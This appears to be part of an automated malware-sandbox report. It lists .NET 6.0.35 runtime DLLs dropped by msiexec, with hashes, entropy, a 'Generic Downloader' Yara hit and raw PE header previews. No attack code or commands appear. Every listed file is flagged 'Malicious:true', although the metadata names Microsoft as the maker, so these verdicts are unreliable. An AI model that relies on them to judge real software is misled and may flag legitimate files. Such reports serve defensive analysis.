                                                                                                                                                                                                                                                                                                                                  SHA1:67DC8BF8B6A120C3CE8FE8BDFF88BD84CB11FE77
                                                                                                                                                                                                                                                                                                                                  SHA-256:A6BF9DB02AA10F6ED725DD5D7E72AEF926361DF982F135CF8D9EAAE4FAFE47AC
                                                                                                                                                                                                                                                                                                                                  SHA-512:62E8CB2DDB1CE54D327F9324BA49ECAFA650A98F83C494F2083A45850334976E7A3B375CAE46B3DE65A384D22E378A862C66506CE5947A4B3C9F9D91B0009D01
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....$............" ..0..............2... ...@....... ...............................A....`.................................92..O....@..8................)...`......l1..T............................................ ............... ..H............text........ ...................... ..`.rsrc...8....@......................@..@.reloc.......`......................@..B................m2......H.......P .......................0......................................BSJB............v4.0.30319......l...X...#~..........#Strings....D.......#US.H.......#GUID...X...D...#Blob............T.........3....................................6.................l...|.l.....Y...............M.......m.....m...c.m.....m.....m.....m...'.m.....m.....m...^.............n...5.l.................S.....S.....S...).S...1.S...9.S...A.S...I.S...Q.S...Y.S...a.S...i.S...q.S...y.S.....S. ...S.....S...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Numerics.Vectors.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.708846111618444
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:1Brpigxx9pWabBWipWjA6Kr4PFHnhWgN7acWDDcADB6ZX01k9z3AtOnV:157jpWabBWiYA6VFHRN7+DcTR9z6iV
                                                                                                                                                                                                                                                                                                                                  MD5:30549E2D5F2895F31260F03550D1AB89
                                                                                                                                                                                                                                                                                                                                  SHA1:2A9A436A1423569F906CAE05BD068849CFFE2D5F
                                                                                                                                                                                                                                                                                                                                  SHA-256:D21E226271AB8F12D1020BD9C644E5E77E6189C4F11931457A1638FAE8E85F21
                                                                                                                                                                                                                                                                                                                                  SHA-512:1962C98B89742FE19B23E928AC5659FF590CF561EB59B47986868794811B58865A76DB54AA6B9F8C2B24B40122D36158DD064BB4C848C3DC29C56634201AF035
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'..........."!..0.............N*... ........@.. ..............................g.....`..................................)..W....@...................)...`......D)..8............................................ ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0*......H........ ..t...................P .......................................T..c@..Go.3..j...Ey..R.C7..Y..Q...~+.\.AN.P...].j.+@.k.m.q[...k..;l...R.....]xh.}E..A.....,}....HnW.o...$g^..M...........%;BSJB............v4.0.30319......`...<...#~..........#Strings............#GUID...........#Blob......................3......................................D.........]...........v...................`...8.....0.......r...\.r.....r.....r.....r.....r.....r...}.r.....r...........6.....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Numerics.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16144
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.700345163959257
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:cYawsYuvWevNWJpWjA6Kr4PFHnhWgN7agW3IgRxwVIX01k9z3AAljul+Yth:YHvvWevNWJYA6VFHRN76PR9z5lju5th
                                                                                                                                                                                                                                                                                                                                  MD5:251B3ADECBFC6975739805BAE9F63A05
                                                                                                                                                                                                                                                                                                                                  SHA1:5B04529783740F8BF1201ECA0DDE06D12C1C9A29
                                                                                                                                                                                                                                                                                                                                  SHA-256:1D46A019294A694C09B124AAD3FB55240A28035410FFF99AE028B08A8B0D42E0
                                                                                                                                                                                                                                                                                                                                  SHA-512:8FF80308BE71189708F8139565818D4510FB8917E8657842635F02BFAAB9F944D80A1683E86E0885FE876BF1309AB12CF4B1497FB7DEC5E169C142595AC97894
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....@..........." ..0..............*... ...@....... ...................................`..................................*..O....@..X................)...`.......)..T............................................ ............... ..H............text........ ...................... ..`.rsrc...X....@......................@..@.reloc.......`......................@..B.................*......H.......P ......................<)......................................BSJB............v4.0.30319......l...|...#~......@...#Strings....(.......#US.,.......#GUID...<.......#Blob............T.........3..........................................0.........]...............................D...?.e...K.e.....e.....e...".e.....e.....e...}.e.....e...V...........e.............-...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y......... .............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ObjectModel.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):91312
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.552363583416721
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:7YFJyHM3VtaIGdrG6mksFajOoPnCXrrgpenOpEINYcIwUAZ+K+t34h6FqgHzqWUE:7Yms3VsI+Dmkz8gMnOQcdDzsqSqWfz/
                                                                                                                                                                                                                                                                                                                                  MD5:298C81F3EBB890CC364CCFDCF34058C5
                                                                                                                                                                                                                                                                                                                                  SHA1:6934C79624BB3DA9D22954EE339049D43D9BB83A
                                                                                                                                                                                                                                                                                                                                  SHA-256:A3D82D91C5C016586867F63F6CB75DD2062BC65068F3F1BFFE87DB6EF3C5F743
                                                                                                                                                                                                                                                                                                                                  SHA-512:F6DF7D3274A50BAAAD7A3B748615BC111040A080AB966956143A2E1A6CFA69A6CB64D6DB192CB1FCFF147BBF5E2C8BB6AC94B2101E6B8136136D5B1D7002BBBD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....=..........." ..... ...................................................`......E&....`...@......@............... ..................................t....).......<...(...P..........T...........................................................x...H............text............ .................. ..`.data...H....0......."..............@....reloc.......P.......:..............@..B............................................0.......................d.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........|.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...X.....0.0.0.0.0.4.b.0...>.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...O.b.j.e.c.t.M.o.d.e.l.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...N.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.e.m...O.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.CoreLib.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10637488
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.834759168341911
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:QKlZeeIfZQsU+fRIwvUVvJS63bX4PrLAU4n/0v4/PyGvjr:3CfSsU+fRI/VvJSyX8OyGv3
                                                                                                                                                                                                                                                                                                                                  MD5:E483FEE9AC7ACE5AD3DBE0922BA0429B
                                                                                                                                                                                                                                                                                                                                  SHA1:EC481C588B3BD84305703C854EAEC4FD5998639E
                                                                                                                                                                                                                                                                                                                                  SHA-256:9133F14A629B51EB91BCB80BE17D6228BDB31CF64F1FF7D62CCB4C70E3D30CA7
                                                                                                                                                                                                                                                                                                                                  SHA-512:318CEC35F2DC2D44AF2CC00AD1300EC71CEB89AC9E199B059E1B3428405583662B2013632A89C961085A5596F1C301AAFF498CA8D8222BCD65E462C21E3284DA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................" .........F...............................................P............`...@......@............... ......................................d........(...(.....|r......T...............................................................H............text.............................. ..`.data.............................@....reloc..|r......t..................@..B............................................0...........................<.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...x.....0.0.0.0.0.4.b.0...F.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...P.r.i.v.a.t.e...C.o.r.e.L.i.b.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...V.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.DataContractSerialization.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2077448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.722460846508454
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:7r/zyRgRZfG3NMhSsdt1VTxpCBqlY5anISqsVZp3tODPPLD2DL0qF2:3/xZOqF2
                                                                                                                                                                                                                                                                                                                                  MD5:19BF6B8608C66AC95564DF67948A1F01
                                                                                                                                                                                                                                                                                                                                  SHA1:2E51080CCD8D044CB7F88E5186CD6A27234E7349
                                                                                                                                                                                                                                                                                                                                  SHA-256:3160457511B908D08EE652586B6288827D894765319E4D874271C6E35C569CCC
                                                                                                                                                                                                                                                                                                                                  SHA-512:F27689677446EEF7D559F94EF7E48C6C3E0629119516D91E9C2F11F80E7481D5AD749A59F75DDE09C03342B1E5FB2CAC3C933A32A05F678FA7977A0F65AE26BD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....t@..........." .................................................................. ...`...@......@............... ..................................L....`..8........)......,!......p...........................................................P...H............text...Q........................... ..`.data...s|.......~..................@....reloc..,!......."...h..............@..B............................................0.......................<.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^...........?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........T.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...0.....0.0.0.0.0.4.b.0...j.)...C.o.m.m.e.n.t.s...S.y.s.t.e.m...P.r.i.v.a.t.e...D.a.t.a.C.o.n.t.r.a.c.t.S.e.r.i.a.l.i.z.a.t.i.o.n.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...z.)...F.i.l.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.Uri.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):252712
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.803118641554585
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:4Y9Nlu+ra9AkzUhysCmV9tC0XAoe0tAqBmlvaP8lgYD3cRW8qZ+aodJsu/Q0DAsg:Di8ZkzvslViFoeEivw8lgw3cKZejsMvg
                                                                                                                                                                                                                                                                                                                                  MD5:EC9FF4357A78C2DCBC6092ADA5A2AE6F
                                                                                                                                                                                                                                                                                                                                  SHA1:5A8EC381B24FB168B9586CEDDE3680506D71AF47
                                                                                                                                                                                                                                                                                                                                  SHA-256:3C038D1F2461A38D1E3E5FA06A524F493554DF07A5B0661968E32B3CCE5212B9
                                                                                                                                                                                                                                                                                                                                  SHA-512:1441EA2BDB046FEC70C628BA3A6920438695190C265F020A54B5614F62452818CF47B6D808DB37D4EDD0532BB349EA09F86AF695D5FAF6F35D4CC09D233F1328
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................" .........&......................................................vx....`...@......@............... ..................................<....V..........().......... ...T...........................................................@...H............text...S........................... ..`.data.... ......."..................@....reloc..............................@..B............................................0.......................,.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^...........?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........D.....S.t.r.i.n.g.F.i.l.e.I.n.f.o... .....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.Xml.Linq.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):405264
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.714042900365998
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:KR+I69Gw4hphuS5BpIVGcHH8lKPmS6up6+:2+WNhpBynH8G16j+
                                                                                                                                                                                                                                                                                                                                  MD5:9D4484E7B3FEC9597EF9ED633AA3168F
                                                                                                                                                                                                                                                                                                                                  SHA1:21DD509808A6A0EECF13298E3FA541A391E452C2
                                                                                                                                                                                                                                                                                                                                  SHA-256:29DB6AF0D7E4400CD041FAC47546B20BDA2CE5EB730264C99FBC0986751085D8
                                                                                                                                                                                                                                                                                                                                  SHA-512:4CC385ED15E2038FCDCA55A57E83CEB787B80E1CEF18EDB2BB36E912563BDEBE7DF74B1AAEA6347B0823299FF967F3483D761387B330543AE0C2752A8B6051B1
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." .........j...............................................0............`...@......@............... ......................................,....0.......)... .......+..T...............................................................H............text...*........................... ..`.data...O`.......b..................@....reloc....... ......................@..B............................................0...........................d.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^...........?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...H.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...P.r.i.v.a.t.e...X.m.l...L.i.n.q...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...X.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.Xml.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):8505608
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.821437608207014
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:Smwr9q/Lo4Ou8M1xwOSZ+0TaFqZlH1naEeVQjhV:h/XOu8MzwOSZRYQ5deWjX
                                                                                                                                                                                                                                                                                                                                  MD5:3A78E5F2522B643BE517D485D2FA9EC5
                                                                                                                                                                                                                                                                                                                                  SHA1:4542B8B41B97CDF08672114D38DA87FAE88775AC
                                                                                                                                                                                                                                                                                                                                  SHA-256:335867B5D2E3FF3FF3B0CFAC4D8B654300AF9E3BEC3E0A6A38441415335381EB
                                                                                                                                                                                                                                                                                                                                  SHA-512:84F92F4661D66AB1EE5EDA970204A5487E941CA0A83C105B701B818B653950E11E9753DFB3F840C055DED799D23F8928CC9501BB6DBD198B9216B1BA438B0C24
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." ......|..............................................................`...@......@............... ..................................<...D...8R.......)...`..X_......T...........................................................@...H............text.....|.......|................. ..`.data...8"...0|..$....|.............@....reloc..X_...`...`...@..............@..B............................................0.......................,.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^...........?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........D.....S.t.r.i.n.g.F.i.l.e.I.n.f.o... .....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.DispatchProxy.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):66312
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.579630181472548
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:SsGqs6PbkymbnA0be+s8cu5BiEUxbluKm0i9pzWYf:SsxsUoymbAiy8BiEY9m0QpyYf
                                                                                                                                                                                                                                                                                                                                  MD5:7051A2BBADB9065085E4354A1F300936
                                                                                                                                                                                                                                                                                                                                  SHA1:EE7E3E2029DDD2E5044A9E74FD4659CA2D792AAC
                                                                                                                                                                                                                                                                                                                                  SHA-256:AC28D3517C24ECC00AF041D5B3C3D878AA816082F658AD826D6F6CD0C4D5E170
                                                                                                                                                                                                                                                                                                                                  SHA-512:1EEE4C0C03E5086A425D047E8EBEFC28EF4DF603BBCEE22A03C363383299ED6C001BF5E45FE8146058285E08E22B21926DB7CE78A7D735DF8EDDA89B9F9668EB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...<.7..........." ......................................................................`...@......@............... .......................................%...........)......0.......T...............................................................H............text............................... ..`.data...............................@....reloc..0...........................@..B............................................0...........................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...X. ...C.o.m.m.e.n.t.s...S.y.s.t.e.m...R.e.f.l.e.c.t.i.o.n...D.i.s.p.a.t.c.h.P.r.o.x.y...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...h. ...F.i.l.e.D.e.s.c.r.i.p.t.i.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Emit.ILGeneration.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.731452166320643
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:KdmAPIh5WVsUWjYA6VFHRN7c7VXC4deR9zVjx0B:nAPCTdFClc7VXC4dC9zVj6
                                                                                                                                                                                                                                                                                                                                  MD5:23DCCA25D64F033EC933CBF083D19EA7
                                                                                                                                                                                                                                                                                                                                  SHA1:3FC9E0DD194587839DDD66ED84DC0F6424031794
                                                                                                                                                                                                                                                                                                                                  SHA-256:BD9BE884AF004544C47727D6C84256395F3968A97C9AF47484BAD919F103A9D4
                                                                                                                                                                                                                                                                                                                                  SHA-512:2C19609752E2E40F3FF48CF30E51B4ED58836FA4DADE6A250EA2F34579CBB9BE4F9B07A68C2D3CDB61537FC8C408946D3DB336E9D4BD7E4C404F75C1E5036596
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\............."!..0.............n*... ........@.. ....................................`..................................*..S....@...................)...`......P)..8............................................ ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P*......H........ ......................P ........................................I(..PNp.....e{..$....v+..P;...:.!P#..4.e.y.P.8.d.t^.|.......}.m.....&.|.z.d.....!y.8.`L.M3..8F.C..c..*...|.K].....6.a.."BSJB............v4.0.30319......`.......#~..t...D...#Strings............#GUID...........#Blob......................3................................................"...........;...........f.......7.................b...!.b.....b...[.b.....b.....b.....b...B.b...O.b...v.............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Emit.Lightweight.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.717541563928021
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:ydbjS8WxRVJW0+X6HRN7hUzDtdQ5R9zP2il:w0yWGFds9znl
                                                                                                                                                                                                                                                                                                                                  MD5:D67025C176E928D4A4D300DC552A8D6C
                                                                                                                                                                                                                                                                                                                                  SHA1:A363A379995B46190824D278836CF752CDCD1A10
                                                                                                                                                                                                                                                                                                                                  SHA-256:39217B38B36627DE4C09A116F3A26E3565C3150255ABDF492B7296B2822B6181
                                                                                                                                                                                                                                                                                                                                  SHA-512:396A77F1F5ACE23A81B59A292576FE7A6EA5C2842E768DE91D956595851323A75BBB0AA826395C0331528CE5374238A6D3BEF644264E33B71E33E42ECD821FA3
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...K\............"!..0..............)... ........@.. ...............................2....`..................................)..K....@..................8)...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........ ......................P ........................................ ..d..]...Y.D.\~...s_..j.Z...J@.Z.....<add....G....Y.b.x...}.\Y.w@..cF.U.S......>32..@S.\.....C.nO..=..n.3...8....6.O...XBSJB............v4.0.30319......`.......#~..H.......#Strings....P.......#GUID...`.......#Blob......................3................................................2...........K.m.........v.......@.................G...1.G.....G...k.G.....G.....G.....G...R.G..._.G.................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Emit.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16144
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.734500709043853
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Ilxvu8CLLW6MbRWcYA6VFHRN7XYdFDR9z7W3F:+u6tFClXYPl9zy
                                                                                                                                                                                                                                                                                                                                  MD5:4FE8A8072F206B46ADDBAD0C61168D59
                                                                                                                                                                                                                                                                                                                                  SHA1:2270D75DFCC5B1A5F4751A5CD027D10FFB62B5B2
                                                                                                                                                                                                                                                                                                                                  SHA-256:C2949807B3BB6EC74EA786708335CAF5484082CE4901AA0D5D1B59608699A79A
                                                                                                                                                                                                                                                                                                                                  SHA-512:685424B68AC153B3E55333F48ACD2B182DFC477CB6F590DAF410EA59532A61BF429948BA9B4E74EE72B43E4E5F2B33E015A18D023249E416CA02667F9373EC0F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b............"!..0..............*... ........@.. ..............................o&....`.................................d*..W....@...................)...`.......)..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H........ ......................P ......................................|....chR.(.._.@...|.3.5.8,.b5.......?O..cT.....>...S....z....K.O.N.2.....j..5..y.........[,5...?..(b..A.\...HL,.....J*. iLBSJB............v4.0.30319......`...X...#~......p...#Strings....(.......#GUID...8.......#Blob......................3................................................"...........;.....2.....f.......$.................+...!.+.....+...[.+.....+.....+.....+...B.+...O.+...v.............

